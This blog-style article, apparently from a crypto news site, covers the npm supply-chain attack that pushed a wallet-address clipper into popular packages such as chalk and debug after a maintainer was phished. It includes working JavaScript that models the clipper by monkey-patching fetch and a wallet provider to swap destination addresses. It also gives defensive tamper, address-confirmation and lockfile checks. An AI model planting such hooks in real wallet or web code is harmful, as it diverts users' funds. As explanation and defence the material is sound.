NPM Attacks, Hackers, and Data Breaches: A Crypto Heist Gone Wrong?

2025/09/10 06:43

A dive into the recent NPM crypto attack: how hackers compromised packages with billions of downloads but walked away with less than $50. A wake-up call for supply chain security.

Yo, what's the deal with NPM attacks, hackers, and data breaches? It's like the Wild West out here in the JavaScript ecosystem. The latest buzz? A massive NPM crypto attack. Let's break it down, New York style.

The Great NPM Crypto Caper: A Heist That Fizzled

So, picture this: attackers pull off what's being called the largest npm supply chain attack in history. They pushed malicious versions of 18 JavaScript packages that between them account for billions of downloads. Sounds like a scene from "Mr. Robot," right? But here's the kicker: they made off with less than $50. Seriously?

It all went down when a well-known maintainer, "qix" (aka Josh Junon), got hit with a phishing email disguised as an official npmjs.com support message. It pushed him to "update" his two-factor authentication on a lookalike login page, which captured his password and one-time code, handing the keys to the kingdom (or, in this case, his npm publishing rights) to the bad guys.

How They Did It (and Why It Didn't Pay Off)

Once inside, the attackers published trojaned versions of popular libraries like chalk, strip-ansi, and debug, packages that are downloaded billions of times a week. The payload was a crypto-clipper: it watched for Ethereum, Bitcoin, Solana, Tron, Litecoin, and Bitcoin Cash wallet addresses and, when a transaction was about to go out, swapped the destination for an address controlled by the attacker.

But here's where the story takes a turn. According to Security Alliance, the attacker's Ethereum address (0xFc4a48) received less than $50 in assets. Initial reports showed a measly five cents in Ether, later joined by about $20 of some random memecoin. Either the poisoned versions were pulled before they spread far, or users caught on quick and shut it down.

Why This Matters (Even Though They Stole Pennies)

Even though the financial impact was minimal, this incident shines a spotlight on the ever-present risk of supply chain attacks. Developers who never directly installed the compromised packages could still be exposed, because these libraries sit deep in dependency trees: any install that resolved a transitive dependency to one of the poisoned versions pulled the malware in without anyone asking for it.

Charles Guillemet, CTO of Ledger, is urging users to be cautious and double-check wallet addresses before signing anything. Crypto apps like Phantom Wallet and Uniswap dodged the bullet, and MetaMask reassured users about its defenses: it uses multiple layers, including pinning its dependency versions and automated checks on incoming code, to block malicious code from reaching a release.

The Technical Nitty-Gritty

The injected code hooked browser primitives like fetch and XMLHttpRequest as well as wallet provider APIs. With those hooks in place it could intercept crypto activity in the browser, rewrite addresses in page content and API responses, and alter transaction parameters before the wallet ever saw them. That's what made it dangerous: it tampered with both what users saw on screen and the requests actually being sent.
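The hooking described in the two paragraphs above (the clipper in "How They Did It" and the fetch/XMLHttpRequest/wallet-API hooks here), as an added example written for this page: it is not the original malware and not code from MetaMask, Ledger, or any other project named in the article. It models the pattern in plain Node.js. A trojaned dependency monkey-patches a fetch-like global and an EIP-1193-style wallet provider (assumed to expose a request({method, params}) method) so Ethereum addresses get rewritten, and two checks a wallet or dApp can run against it follow. The merchant API, the provider object, and every address are constructed placeholders.

```javascript
// Added example: a stripped-down model of the "crypto-clipper" pattern the
// article describes. Not the original malware and not code from MetaMask,
// Ledger, or any project named here. Every address, URL and API payload
// below is a constructed placeholder.

const ETH_ADDRESS_RE = /0x[0-9a-fA-F]{40}/g;

// Constructed placeholders (not real addresses).
const ATTACKER_ADDRESS = "0x" + "ab".repeat(20);
const MERCHANT_ADDRESS = "0x" + "11".repeat(20);

// ---------- The hook: what a trojaned dependency can do at load time ----------

// Regex-and-replace over arbitrary text: the same trick works on DOM content
// and on network response bodies.
function swapAddresses(text, attackerAddress = ATTACKER_ADDRESS) {
  return text.replace(ETH_ADDRESS_RE, attackerAddress);
}

// Monkey-patch a global fetch-like function so callers receive rewritten bodies.
// Callers that only read the response have no way to notice.
function hookFetch(globals) {
  const original = globals.fetch;
  globals.fetch = async function clippedFetch(...args) {
    const response = await original(...args);
    const body = swapAddresses(await response.text());
    return { text: async () => body, json: async () => JSON.parse(body) };
  };
}

// Wrap an EIP-1193-style wallet provider (assumed shape) so `to` is rewritten
// on the way out, even if the UI showed the right address.
function hookProvider(provider) {
  const original = provider.request.bind(provider);
  provider.request = async function clippedRequest(req) {
    if (req.method === "eth_sendTransaction" && Array.isArray(req.params)) {
      const [tx, ...rest] = req.params;
      req = { ...req, params: [{ ...tx, to: ATTACKER_ADDRESS }, ...rest] };
    }
    return original(req);
  };
}

// ---------- The checks: what a wallet or dApp can do ----------

// 1. Snapshot trusted references before any dependency code runs; a patched
//    global fails the identity comparison later.
function isTampered(globals, trusted) {
  return globals.fetch !== trusted.fetch;
}

// 2. Never trust a destination scraped from page content or an API body.
//    Compare it with the address the user confirmed out of band (for a
//    hardware wallet, the one shown on the device screen).
function destinationMatches(tx, confirmedAddress) {
  return typeof tx.to === "string" &&
    tx.to.toLowerCase() === confirmedAddress.toLowerCase();
}

// ---------- Demo on constructed data ----------

// Stand-in for the page's real fetch: a hypothetical merchant payment API.
async function fakeFetch() {
  const body = JSON.stringify({ to: MERCHANT_ADDRESS, amount: "0.5" });
  return { text: async () => body, json: async () => JSON.parse(body) };
}

async function demo() {
  const globals = { fetch: fakeFetch };
  const trusted = { fetch: globals.fetch }; // taken before "dependencies" load
  const provider = {
    sent: [],
    async request(req) { this.sent.push(req); return "0x" + "00".repeat(32); },
  };

  // A trojaned dependency initializes and installs both hooks.
  hookFetch(globals);
  hookProvider(provider);

  // The dApp fetches a payment request and sees a swapped address.
  const response = await globals.fetch("https://merchant.example/api/pay");
  const payment = await response.json();

  // Even with the correct address passed in, the provider hook rewrites it.
  await provider.request({
    method: "eth_sendTransaction",
    params: [{ to: MERCHANT_ADDRESS, value: "0x1" }],
  });

  return {
    shownTo: payment.to,                                          // attacker address
    tampered: isTampered(globals, trusted),                       // true
    uiCheckPasses: destinationMatches(payment, MERCHANT_ADDRESS), // false
    actuallySentTo: provider.sent[0].params[0].to,                // attacker address
  };
}

demo().then((result) => console.log(result));
```

Run it with node: the demo returns the swapped address the UI would show, the identity check flagging the patched fetch, the destination check failing, and the rewritten "to" on the outgoing transaction. The identity snapshot only helps if it is taken before third-party code loads, and a hook that leaves the fetch function itself alone (patching the response reader, say) would slip past it. That is why the out-of-band address confirmation is the check that actually matters.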

Aikido Security noted that the malware only reached users who installed or updated the packages during the brief window before the poisoned versions were removed. That limited the reach, but it's still a wake-up call.

Lessons Learned: Keep Your Guard Up

This whole mess underscores the need for stronger security practices. Two-factor authentication is a must, but a phishing page can relay a one-time code just as easily as a password, which is exactly how this account was taken; phishing-resistant 2FA (a FIDO2/WebAuthn security key, whose credential is bound to the real npmjs.com origin) is what actually stops that lure. Always verify wallet addresses before sending funds, on the hardware wallet's own screen if you have one, and use wallets with built-in security layers like MetaMask and Ledger.

Security firms recommend developers pin exact dependency versions, commit the lockfile and install from it (npm ci rather than npm install) so a build can't silently pick up a new release, and use automated scanning tools to catch unexpected library changes. Staying vigilant is key.
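Two of those checks in working form, added here as an example and not code from the article or from any security firm it cites: a scan of package.json for dependencies declared as ranges rather than exact pins, and a walk of a package-lock.json "packages" map (the layout used by lockfileVersion 2 and 3) that flags any package at any nesting depth whose version is on a watchlist. Both manifests and every version in the watchlist are constructed placeholders; a real watchlist comes from the incident advisory, not from this file.

```javascript
// Added example: two manifest checks a CI step can run. Not code from the
// article or from any security firm it cites. Both manifests and every
// version in the watchlist are constructed placeholders.

// Constructed package.json excerpt.
const SAMPLE_PACKAGE_JSON = {
  dependencies: {
    chalk: "^5.0.0",        // floating range: a fresh install may resolve to a newer 5.x
    debug: "4.3.4",         // exact pin
    "strip-ansi": "~7.1.0", // floating range
  },
};

// Constructed package-lock.json excerpt (lockfileVersion 2/3 "packages" map).
// Note the nested copy of strip-ansi under another package: transitive
// dependencies live at arbitrary depth and must be audited too.
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    "": { dependencies: { chalk: "^5.0.0", debug: "4.3.4" } },
    "node_modules/chalk": { version: "9.9.9" },
    "node_modules/debug": { version: "4.3.4" },
    "node_modules/some-tool": { version: "1.0.0" },
    "node_modules/some-tool/node_modules/strip-ansi": { version: "9.9.8" },
  },
};

// Constructed watchlist: package -> versions to flag (placeholder numbers,
// not the versions involved in the real incident).
const WATCHLIST = {
  chalk: ["9.9.9"],
  "strip-ansi": ["9.9.8"],
  debug: ["9.9.7"],
};

// Exact semver (optionally with a prerelease tag). Anything else is a range.
const EXACT_VERSION_RE = /^\d+\.\d+\.\d+(?:-[0-9A-Za-z.-]+)?$/;

// Report dependencies declared with a range instead of an exact version.
function findFloatingPins(pkg) {
  const floating = [];
  for (const field of ["dependencies", "devDependencies", "optionalDependencies"]) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      if (!EXACT_VERSION_RE.test(spec)) floating.push({ field, name, spec });
    }
  }
  return floating;
}

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"; the root entry "" -> null.
function packageNameFromLockPath(lockPath) {
  const marker = "node_modules/";
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? null : lockPath.slice(idx + marker.length);
}

// Walk every installed package at any depth and return watchlist matches.
function auditLockfile(lock, watchlist) {
  const hits = [];
  for (const [lockPath, entry] of Object.entries(lock.packages || {})) {
    const name = packageNameFromLockPath(lockPath);
    if (name === null || typeof entry.version !== "string") continue;
    if ((watchlist[name] || []).includes(entry.version)) {
      hits.push({ name, version: entry.version, path: lockPath });
    }
  }
  return hits;
}

// Combine both checks; `ok` is what a CI gate would key its exit status on.
function runChecks(pkg = SAMPLE_PACKAGE_JSON, lock = SAMPLE_LOCKFILE, watchlist = WATCHLIST) {
  const floating = findFloatingPins(pkg);
  const hits = auditLockfile(lock, watchlist);
  return { floating, hits, ok: floating.length === 0 && hits.length === 0 };
}

const result = runChecks();
console.log(JSON.stringify(result, null, 2));
// In a real pipeline: process.exitCode = result.ok ? 0 : 1;
```

Pinning alone does not help if the lockfile is not honored: npm install will still rewrite the lockfile when the ranges in package.json permit, whereas npm ci installs exactly what the lockfile records and fails if the two disagree. Running this against the committed lockfile in CI, with the watchlist refreshed from advisories, is the cheap version of the "automated checks" the article mentions.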

Final Thoughts: A Crypto Comedy of Errors

So, yeah, hackers tried to pull off a massive crypto heist and ended up with pocket change. It's almost comical. But let's not get complacent. This NPM attack is a reminder that even the most secure systems can be vulnerable. Stay sharp, double-check those addresses, and maybe invest in a good spam filter. And remember, in the world of crypto and coding, a little paranoia goes a long way. Stay safe out there!

Original source: livebitcoinnews